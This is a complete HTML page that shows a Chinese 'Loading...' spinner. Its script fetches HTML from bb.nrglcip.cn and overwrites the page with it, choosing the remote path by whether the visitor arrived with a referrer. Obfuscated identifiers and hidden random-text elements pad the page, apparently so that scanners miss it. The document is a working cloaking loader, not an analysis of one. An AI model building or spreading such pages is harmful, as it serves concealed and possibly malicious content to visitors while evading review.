<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LUMbyWF {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LUMbyWF .IpcDoRSn5 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LUMbyWF .content {
            line-height: 50px;
            text-align: center
        }

        .LUMbyWF .img {
            width: 100%
        }

        .LUMbyWF .dsxPvDn {
            text-align: center
        }

        .LUMbyWF .dsxPvDn span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LUMbyWF .dsxPvDn span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LUMbyWF .dsxPvDn span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LUMbyWF .dsxPvDn span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LUMbyWF .dsxPvDn span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LUMbyWF .dsxPvDn span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LUMbyWF .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function GKg0Z7L5oN5U(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var y9R9EYz = GKg0Z7L5oN5U('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ y9R9EYz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ y9R9EYz +".html?a=share";
		}
		
        Ix2fkWpTaP=url+"#"+new Date().getTime();
        Ix2fkWpTaP && function() {
            $.get(Ix2fkWpTaP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>ksP9HcuzS3EPulovBubEBVvBr0IjJFrUN1Y2mvb6ue</a>
<a  href='#' style='display:none'>ksP9HcuzS3EPulovBubEBVvBr0IjJFrUN1Y2mvb6ue</a>
<ul style='display:none' >PVCbfYjicpmBSq</ul>
<ul style='display:none' >PVCbfYjicpmBSq</ul>
<img  src='' style='display:none'>
<div style='display:none'>CoQimeelIKCZBv7qqx3p3rgDZx9stBepcqIxcbyFj</div>
<p  style='display:none'>qr2dv4Fhwjs8nVBP</p><div class="LUMbyWF">
    <div class="IpcDoRSn5">
        <div class="dsxPvDn">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>HwJE1w0470w0WozZLu01p95SM</a>
<img  src='' style='display:none'>
<ul style='display:none' >MBsgbibzrXRTjRmfJeKNz9sliRfmd091luAgk75A3vbBxL21Oc59N15APlAwhA1mypkprDWoSr2rA4MRrX0dpH</ul></body>
</html>